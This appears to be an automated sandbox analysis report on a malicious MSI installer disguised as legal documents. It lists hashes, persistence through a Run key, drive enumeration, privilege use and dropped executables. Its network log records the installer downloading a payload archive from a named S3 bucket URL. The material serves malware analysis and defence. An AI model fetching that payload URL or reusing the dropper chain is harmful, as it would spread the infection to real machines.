Analysis
-
max time kernel
74s -
max time network
116s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
23-09-2021 13:37
Static task
static1
Behavioral task
behavioral1
Sample
FOLHAS-PAGINAS-ADVOCACIA.msi
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
General
-
Target
FOLHAS-PAGINAS-ADVOCACIA.msi
-
Size
2.8MB
-
MD5
8446fedeadab37c667b02dd7e0fdac26
-
SHA1
04e9d8f6301946ae9a9fef977a5424f722fd9435
-
SHA256
f01cc28590e94c1af30ca919a93f2615285f6774f5fc6b7cd8f933fac3303203
-
SHA512
bfad67c71ac19a608cf03f93c18adb6d8073cc1deba149e8c0763a851c29de4a27064e36fb7a32bc5ffa82af3d45723d4ae34250f21526ef1853d92ef5362df1
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1600 MsiExec.exe 6 1600 MsiExec.exe 8 1600 MsiExec.exe -
Executes dropped EXE 2 IoCs
pid Process 1640 MSI2AA7.tmp 1768 N9O987TDS.exe -
Loads dropped DLL 13 IoCs
pid Process 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1600 MsiExec.exe 1768 N9O987TDS.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run msiexec.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI292E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2A96.tmp msiexec.exe File opened for modification C:\Windows\Installer\2adea.msi msiexec.exe File created C:\Windows\Installer\2adec.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIBD6F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI27A7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB1A4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBC93.tmp msiexec.exe File opened for modification C:\Windows\Installer\2adec.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIBB29.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBBA7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2AA7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB136.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB3A8.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIBA4D.tmp msiexec.exe File created C:\Windows\Installer\2adea.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIAEB5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBA7D.tmp msiexec.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 916 msiexec.exe 916 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1544 msiexec.exe Token: SeIncreaseQuotaPrivilege 1544 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeSecurityPrivilege 916 msiexec.exe Token: SeCreateTokenPrivilege 1544 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1544 msiexec.exe Token: SeLockMemoryPrivilege 1544 msiexec.exe Token: SeIncreaseQuotaPrivilege 1544 msiexec.exe Token: SeMachineAccountPrivilege 1544 msiexec.exe Token: SeTcbPrivilege 1544 msiexec.exe Token: SeSecurityPrivilege 1544 msiexec.exe Token: SeTakeOwnershipPrivilege 1544 msiexec.exe Token: SeLoadDriverPrivilege 1544 msiexec.exe Token: SeSystemProfilePrivilege 1544 msiexec.exe Token: SeSystemtimePrivilege 1544 msiexec.exe Token: SeProfSingleProcessPrivilege 1544 msiexec.exe Token: SeIncBasePriorityPrivilege 1544 msiexec.exe Token: SeCreatePagefilePrivilege 1544 msiexec.exe Token: SeCreatePermanentPrivilege 1544 msiexec.exe Token: SeBackupPrivilege 1544 msiexec.exe Token: SeRestorePrivilege 1544 msiexec.exe Token: SeShutdownPrivilege 1544 msiexec.exe Token: SeDebugPrivilege 1544 msiexec.exe Token: SeAuditPrivilege 1544 msiexec.exe Token: SeSystemEnvironmentPrivilege 1544 msiexec.exe Token: SeChangeNotifyPrivilege 1544 msiexec.exe Token: SeRemoteShutdownPrivilege 1544 msiexec.exe Token: SeUndockPrivilege 1544 msiexec.exe Token: SeSyncAgentPrivilege 1544 msiexec.exe Token: SeEnableDelegationPrivilege 1544 msiexec.exe Token: SeManageVolumePrivilege 1544 msiexec.exe Token: SeImpersonatePrivilege 1544 msiexec.exe Token: SeCreateGlobalPrivilege 1544 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe Token: SeRestorePrivilege 916 msiexec.exe Token: SeTakeOwnershipPrivilege 916 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1544 msiexec.exe 1544 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1600 916 msiexec.exe 28 PID 916 wrote to memory of 1640 916 msiexec.exe 32 PID 916 wrote to memory of 1640 916 msiexec.exe 32 PID 916 wrote to memory of 1640 916 msiexec.exe 32 PID 916 wrote to memory of 1640 916 msiexec.exe 32 PID 916 wrote to memory of 1640 916 msiexec.exe 32 PID 916 wrote to memory of 1640 916 msiexec.exe 32 PID 916 wrote to memory of 1640 916 msiexec.exe 32
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\FOLHAS-PAGINAS-ADVOCACIA.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1544
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0EC9DF812EA027A8D9129985DE29F1462⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1600
-
-
C:\Windows\Installer\MSI2AA7.tmp"C:\Windows\Installer\MSI2AA7.tmp" /DontWait "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"2⤵
- Executes dropped EXE
PID:1640
-
-
C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1768
Network
-
Remote address:8.8.8.8:53Requestintermediari.s3.us-east-2.amazonaws.comIN AResponseintermediari.s3.us-east-2.amazonaws.comIN CNAMEs3-r-w.us-east-2.amazonaws.coms3-r-w.us-east-2.amazonaws.comIN A52.219.96.24
-
Remote address:52.219.96.24:443RequestGET /N9O987TDS.zip HTTP/1.1
Accept: */*
User-Agent: AdvancedInstaller
Host: intermediari.s3.us-east-2.amazonaws.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
x-amz-request-id: EAZZ5NRG1GNT8EX3
Date: Thu, 23 Sep 2021 13:37:48 GMT
Last-Modified: Tue, 21 Sep 2021 21:09:36 GMT
ETag: "bcb214ddae34849b9fe721cde898f644"
Accept-Ranges: bytes
Content-Type: application/zip
Server: AmazonS3
Content-Length: 9144960
-
152 B 3
-
52.219.96.24:443https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.ziptls, httpMsiExec.exe149.8kB 9.4MB 3245 6441
HTTP Request
GET https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zipHTTP Response
200